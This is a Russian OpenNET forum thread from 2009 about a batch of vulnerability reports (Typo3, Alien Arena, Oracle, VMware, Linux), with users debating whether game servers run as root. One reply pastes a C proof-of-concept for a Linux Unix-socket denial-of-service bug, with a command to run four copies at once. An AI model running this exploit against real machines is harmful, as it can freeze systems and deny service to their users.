The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."
Вариант для распечатки  
Пред. тема | След. тема 
Форумы Разговоры, обсуждение новостей (Public)
Изначальное сообщение [ Отслеживать ]

"Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от opennews on 24-Окт-09, 22:47 
Серия новых уязвимостей:

-  В системе управления web-контентом Typo3 (http://typo3.org/) найдено 7 уязвимостей (http://secunia.com/advisories/37122/), среди которых имеется серьезная проблема - возможность осуществить подстановку SQL кода аутентифицированным пользователем. Остальные проблемы связаны с совершением XSS атак (межсайтовый скриптинг), обходом механизмов контроля доступа и возможностью выполнить shell-скрипты на сервере, при наличии редакторского уровня доступа и установке стороннего upload-расширений. С исправлением проблем (http://typo3.org/teams/security/security-bulletins/typo3-sa-.../) в экстренном порядке выпущены версии 4.1.13, 4.2.10 и 4.3beta2.

-  В открытой игре  Alien Arena (http://red.planetarena.org/) найдена критическая уязвимость (http://secunia.com/advisories/37118/), позволяющая злоумышленнику выполнить свой код на игровом сервере, отправив специально модифицированный UDP-пакет на сетевой порт 27901. Проблема испрошена в выпуске 7.31;

-  В п...

URL: http://www.oracle.com/technology/deploy/security/critical-pa...
Новость: https://www.opennet.ru/opennews/art.shtml?num=23973

Высказать мнение | Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от NicK on 24-Окт-09, 22:47 
А что сервер Alien Arena выполняется с правами root?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

3. "Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от anonymouse on 24-Окт-09, 23:27 
> А что сервер Alien Arena выполняется с правами root?

А что левый код у вас может выполнятся под учётной записью?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

5. "Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от XoRe (ok) on 25-Окт-09, 00:49 
>А что сервер Alien Arena выполняется с правами root?

Думаю, как настроят, так и выполняется.
А настраивают по разному...)

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

7. "Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от Zenitur email on 26-Окт-09, 03:11 
Если человек создаст сервер на FreeBSD или Linux, который будет круглосуточно заниматься только Alien Arena, то да - вполне возможно, что сервер запустится от root.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от User294 (ok) on 24-Окт-09, 23:08 
> В системе управления web-контентом Typo3 найдено 7 уязвимостей,

А кто-то мне говорил что он безопасный... но как видим нет в мире совершенства.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

4. "Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от ононим on 24-Окт-09, 23:30 
Кнут считает по другому.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

8. "Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от Moosh on 26-Окт-09, 15:56 
Тупо3 и безопасный? Оксюморон!
Вместо чем верить кому-то, стоило просто посмотреть security advisory.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

6. "Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin..."  +/
Сообщение от pavlinux (ok) on 25-Окт-09, 19:35 
> Из за трудности эксплуатации уязвимостям присвоен незначительный уровень опасности.

------------
int main(void) {

int ret, csd, lsd;
struct sockaddr_un sun;

/* make an abstruct name address (*) */
memset(&sun, 0, sizeof(sun));
sun.sun_family = PF_UNIX;
sprintf(&sun.sun_path[1], "%d", getpid());

/* create the listening socket and shutdown */
lsd = socket(AF_UNIX, SOCK_STREAM, 0);
bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
listen(lsd, 1);
shutdown(lsd, SHUT_RDWR);

/* connect loop */
alarm(15); /* forcely exit the loop after 15 sec */
for (;;) {
    csd = socket(AF_UNIX, SOCK_STREAM, 0);
    ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
    if (-1 == ret) {
        perror("connect()");
        break;
    }
    puts("Connection OK");
   }
return 0;
}
-----

You should run the ./unix-socket-dos-exploit concurrently, like below:
for i in {1..4} ; do ./unix-socket-dos-exploit & done
# For safety reason, the PoC code stops in 15 seconds by alarm(15).


http://patchwork.kernel.org/patch/54678/

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2022 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру